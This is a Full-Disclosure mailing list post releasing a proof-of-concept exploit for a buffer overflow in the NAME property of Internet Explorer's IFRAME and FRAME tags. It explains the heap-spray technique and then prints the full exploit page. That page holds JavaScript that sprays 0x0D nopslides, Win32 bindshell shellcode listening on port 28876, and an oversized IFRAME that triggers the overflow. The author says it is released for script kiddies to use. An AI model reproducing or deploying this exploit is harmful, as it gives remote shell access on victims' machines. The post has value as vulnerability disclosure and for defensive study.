
[Full-Disclosure] MSIE <IFRAME> and <FRAME> tag NAME property buffer overflow PoC exploit (was: python does mangleme (with IE bugs!))



Since nobody else posted an exploit I figured I might as well slap the BoF 
together with my default exploit JavaScript for the scriptkiddies to rejoice 
and the sysadmins to worry about.
<TECHNICAL>

The JavaScript creates a large number of heap blocks filled with 0x0D-byte 
nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 
0x0D0D0D0D. It's not the most efficient thing in the world, but it works like a 
charm for most IE bugs.

The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04                      68 847B7071     PUSH    71707B84
7178EC09                      50              PUSH    EAX
7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.

We land inside one of the nopslides and slide on down to the shellcode. The 
shellcode is of the portbinding type, port 28876 to be exact. So now you know 
when to send me a happy birthday email...

The exploit works with both the <FRAME> and the <IFRAME> tag; the attached file 
uses <IFRAME>.
</TECHNICAL>
<DUMMIES>
For all you guys that cannot set up their AV software right, you can download 
the attachment from one of the many mirrors of this list.
</DUMMIES>

Cheers,
SkyLined

<HTML><!--
________________________________________________________________________________

    ,sSSSs,   Ss,       Internet Exploiter v0.1
   SS"  `YS'   '*Ss.    MSIE <IFRAME src=... name="..."> BoF PoC exploit
  iS'            ,SS"   Copyright (C) 2003, 2004 by Berend-Jan Wever.
  YS,  .ss    ,sY"      http://www.edup.tudelft.nl/~bjwever
  `"YSSP"   sSS         <skylined@edup.tudelft.nl>
________________________________________________________________________________

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.
-->



  <SCRIPT language="javascript">
    // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
    // and/or use as return address. Thanks to blazde for feedback and ideas.

    // Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
    // others for inspiration and borrowed code.
    shellcode = 
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i=0;i<700;i++) memory[i] = block + shellcode;
  </SCRIPT>

  <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
    We land inside one of the nopslides and slide on down to the shellcode.
  -->

  <IFRAME 
SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
 
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC